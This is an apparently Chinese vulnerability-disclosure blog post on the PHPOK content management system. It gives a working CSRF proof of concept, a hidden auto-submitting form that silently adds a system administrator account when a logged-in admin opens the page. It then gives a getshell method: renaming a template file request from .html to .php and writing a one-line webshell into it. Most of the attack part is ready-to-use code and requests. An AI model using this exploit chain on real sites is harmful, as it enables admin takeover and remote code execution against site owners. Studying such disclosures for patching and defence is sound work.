phpok csrf添加管理员+后台getshell

  • 内容
  • 评论
  • 相关

老问题,一直没修复。

poc:

code 区域
<div style="display:none">

<form action="http://localhost/phpok/admin.php?c=admin&f=save" id="poc" name="poc" method="post">

<input type="hidden" name="id" value=""/>

<input type="hidden" name="account" value=""/>

<input type="hidden" name="pass" value=""/>

<input type="hidden" name="email" value=""/>

<input type="hidden" name="status" value=""/>

<input type="hidden" name="if_system" value=""/>

<input type="submit" name="up" value="submit"/>

</form>

<script>

var t = document.poc;

t.account.value="wooyun";

t.pass.value="123456";

t.status.value="1";

t.if_system.value="1";

document.poc.submit();

</script>

</div>

QQ截图20150114173941.png

访问poc后

QQ截图20150114174011.png

Getshell:

风格管理-创建模板文件

默认这里只能添加html文件。但是可以绕过

QQ截图20150114174536.png

code 区域
GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.html

修改成

code 区域
GET /phpok/admin.php?c=tpl&f=create&id=1&folder=/&type=file&title=wooyun.php

QQ截图20150114174709.png

然后在编辑文件写入一句话木马就OK了。

评论

0条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注

*

code